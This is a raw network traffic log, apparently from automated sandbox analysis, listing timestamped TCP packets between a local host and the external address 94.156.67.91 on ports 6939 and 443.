May 24, 2024 05:10:17.081074953 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:17.084162951 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:17.084173918 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:17.084183931 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:17.084228039 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:17.084995031 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:17.085154057 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:17.086909056 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:17.089792967 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:17.089848995 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:17.128612041 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:17.128690004 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:17.144095898 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:17.181720018 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:17.181884050 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:17.186979055 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.002965927 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.003087997 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.003351927 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.004206896 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.005311012 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.005321980 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.005506992 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.006302118 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.006313086 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.006320953 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.006469965 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.006469965 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.007081032 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.007093906 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.007157087 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.008188009 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.008198977 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.008208036 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.008245945 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.010377884 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.010389090 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.010396957 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.010438919 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.010438919 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.012494087 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.012505054 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.012514114 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.012551069 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.014218092 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.014229059 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.014236927 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.014374971 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.014374971 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.015984058 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.015995026 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.015999079 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.016136885 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.017642021 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.017652988 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.017662048 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.017694950 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.017728090 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.019383907 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.019396067 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.019454956 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.021080971 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.021092892 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.021100998 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.021147966 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.021147966 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.021913052 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.021944046 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.021986008 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.023437977 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.023449898 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.023492098 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.024935961 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.025703907 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.025715113 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.025751114 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.027245998 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.027256966 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.027265072 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.027400017 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.027400970 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.028758049 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.028769016 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.028830051 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.030210018 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.030221939 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.030277967 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.031450033 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.031461954 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.031513929 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.032711983 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.032723904 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.032763004 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.033937931 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.033950090 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.033958912 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.034014940 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.035187960 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.035198927 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.035239935 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.036359072 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.036370039 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.036411047 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.037533998 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.037544966 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.037584066 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.038707018 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.038718939 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.038727999 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.038765907 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.038799047 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.039859056 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.039870977 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.039927006 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.041027069 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.041038036 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.041100979 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.042114019 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.042124987 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.042169094 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.043235064 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.043246984 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.043294907 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.044308901 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.044321060 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.044331074 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.044378042 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.045434952 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.045447111 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.045500994 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.046319008 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.046330929 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.046375036 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.047278881 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.047291040 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.047337055 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.048324108 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.048336029 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.048346043 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.048373938 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.048405886 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.049200058 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.049211979 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.049320936 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.050148010 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.050160885 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.050206900 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.051064968 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.051291943 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.051341057 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.051770926 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.051784039 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.051831007 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.052690029 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.052700996 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.052745104 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.053580046 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.053591013 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.053628922 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.054408073 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.054872036 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.054883957 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.054892063 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.054917097 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.054949045 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.055732965 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.055743933 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.055783033 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.056571007 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.056581974 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.056619883 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.057418108 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.057429075 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.057472944 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.058201075 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.058212042 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.058219910 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.058248043 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.058934927 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.058945894 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.059000969 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.059668064 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.059679031 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.059726000 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.060422897 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.060434103 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.060486078 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.061155081 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.061165094 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.061207056 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.061887026 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.061897039 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.061903000 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.061937094 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.061969042 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.062582970 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.062592030 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.062640905 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.063319921 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.063329935 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.063374996 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.064013958 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.064024925 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.064068079 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.064707041 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.064717054 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.064723969 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.064764023 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.065397978 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.065407991 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.065458059 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.066077948 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.066087961 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.066128016 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.066754103 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.066762924 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.066771030 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.066802025 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.066833973 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.067764044 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.067774057 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.067780972 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.067790985 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.067819118 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.067850113 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.068722010 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.068732977 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.068742037 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.068777084 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.069679976 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.069689989 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.069698095 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.069730997 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.069761992 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.070612907 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.070624113 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.070630074 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.070640087 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.070662022 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.070693016 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.071513891 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.071525097 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.071532965 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.071564913 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.072374105 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.072385073 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.072393894 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.072423935 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.072454929 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.073327065 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.073337078 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.073344946 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.073354959 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.073379040 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.073410988 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.074111938 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.074122906 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.074131966 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.074162006 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.074899912 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.074909925 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.074918032 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.074949026 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.074980021 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.075725079 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.075736046 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.075745106 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.075753927 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.075774908 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.075804949 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.076536894 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.076548100 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.076556921 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.076586008 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.077289104 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.077300072 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.077307940 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.077339888 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.077370882 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.078075886 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.078085899 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.078093052 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.078102112 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.078126907 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.078157902 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.078799963 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.078809023 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.078818083 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.078826904 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.078854084 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.078854084 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.079796076 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.079807043 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.079813957 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.079823017 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.079830885 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.079845905 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.079878092 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.080698013 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.080744982 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.127366066 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.127439022 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.229331017 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.234354019 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.234555960 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.239409924 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.515860081 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.516307116 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.516307116 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.521512985 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.521522999 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.521687984 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.521688938 CEST	49740	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:18.570421934 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:18.577399969 CEST	6939	49740	94.156.67.91	192.168.2.4
May 24, 2024 05:10:19.192065954 CEST	49741	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:19.192109108 CEST	443	49741	94.156.67.91	192.168.2.4
May 24, 2024 05:10:19.192186117 CEST	49741	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:19.192276001 CEST	49741	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:19.192281961 CEST	443	49741	94.156.67.91	192.168.2.4
May 24, 2024 05:10:19.880729914 CEST	443	49741	94.156.67.91	192.168.2.4
May 24, 2024 05:10:19.880827904 CEST	49741	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:19.884567022 CEST	49741	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:19.884586096 CEST	443	49741	94.156.67.91	192.168.2.4
May 24, 2024 05:10:19.885092020 CEST	443	49741	94.156.67.91	192.168.2.4
May 24, 2024 05:10:19.886336088 CEST	49741	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:19.930505991 CEST	443	49741	94.156.67.91	192.168.2.4
May 24, 2024 05:10:24.747644901 CEST	443	49741	94.156.67.91	192.168.2.4
May 24, 2024 05:10:24.747797966 CEST	443	49741	94.156.67.91	192.168.2.4
May 24, 2024 05:10:24.747875929 CEST	49741	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:24.748008013 CEST	49741	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:24.748055935 CEST	443	49741	94.156.67.91	192.168.2.4
May 24, 2024 05:10:24.748087883 CEST	49741	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:24.748104095 CEST	443	49741	94.156.67.91	192.168.2.4
May 24, 2024 05:10:25.753247976 CEST	49742	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:25.753340006 CEST	443	49742	94.156.67.91	192.168.2.4
May 24, 2024 05:10:25.753457069 CEST	49742	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:25.753530979 CEST	49742	443	192.168.2.4	94.156.67.91
May 24, 2024 05:10:25.753549099 CEST	443	49742	94.156.67.91	192.168.2.4
May 24, 2024 05:10:26.394912958 CEST	443	49742	94.156.67.91	192.168.2.4
May 24, 2024 05:10:26.395133972 CEST	49742	443	192.168.2.4	94.156.67.91
